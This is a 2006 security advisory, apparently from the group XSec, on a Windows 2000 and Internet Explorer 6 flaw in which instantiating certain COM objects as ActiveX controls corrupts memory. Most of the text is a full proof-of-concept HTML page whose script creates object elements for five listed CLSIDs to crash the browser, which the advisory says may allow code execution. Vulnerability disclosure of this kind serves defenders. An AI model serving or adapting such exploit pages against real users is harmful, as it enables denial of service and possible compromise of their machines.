Advisory ID: XSec-06-08 Advisory Name: Windows 2000 Multiple COM Object Instantiation Vulnerability Release Date: 08/21/2006 Tested on: Windows 2000/Internet Explorer 6.0 SP1 Affected version: Windows 2000 Author: nop <nop#xsec.org> http://www.xsec.org Overview: Multiple vulnerability has been found in Windows 2000, \ When Internet Explorer tries to instantiate the ciodm.dll, \ MyInfo.dll,msdxm.ocx,Creator.dll(Media player 9) COM object \ as an ActiveX control, it may corrupt system memory in such \ a way that an attacker may DoS and possibly could execute \ arbitrary code. Exploit: =============== 2000obj.htm start ================ <!-- // Windows 2000 Multiple COM Object Instantiation Vulnerability // tested on Windows 2000 SP4 CN // http://www.xsec.org // nop (nop#xsec.org) --!> <html> <head> <title>COM-tester</title> </head> </body> <script> var i =0; var clsid = new Array( // NO: 1 // CLSID: {3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D} // Info: Microsoft Index Server Catalog Administration Object // ProgID: Microsoft.ISCatAdm.1 // InprocServer32: C:\WINNT\system32\ciodm.dll "{3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}", // NO: 2 // CLSID: {4682C82A-B2FF-11D0-95A8-00A0C92B77A9} // Info: MyInfo ASP Component// ProgID: MSWC.MyInfo.1 // InprocServer32: C:\WINNT\system32\inetsrv\MyInfo.dll "{4682C82A-B2FF-11D0-95A8-00A0C92B77A9}", // NO: 3 // CLSID: {8E71888A-423F-11D2-876E-00A0C9082467} // Info: RadioServer Class // ProgID: Mmedia.RadioServer.1 // InprocServer32: C:\WINNT\system32\msdxm.ocx "{8E71888A-423F-11D2-876E-00A0C9082467}", // NO: 4 media player? // CLSID: {606EF130-9852-11D3-97C6-0060084856D4} // Info: CdCreator Class// ProgID: Creator.CdCreator.1 // InprocServer32: C:\Program Files\Common Files\Adaptec Shared\CreatorAPI\creator.dll "{606EF130-9852-11D3-97C6-0060084856D4}", // NO: 5 media player? // CLSID: {F849164D-9863-11D3-97C6-0060084856D4} // Info: CdDevice Class// ProgID: Creator.CdDevice.1 // InprocServer32: C:\Program Files\Common Files\Adaptec Shared\CreatorAPI\creator.dll "{F849164D-9863-11D3-97C6-0060084856D4}", // END null ); while(clsid[i]) { var a = document.createElement("object"); window.status = "Testing Object " + clsid[i] + "..."; a.setAttribute("classid", "clsid:" + clsid[i]); i++; } window.status = "failed!"; </script> </body> </html> =============== 2000obj.htm end ================== Link: http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=16 About XSec: We are redhat.
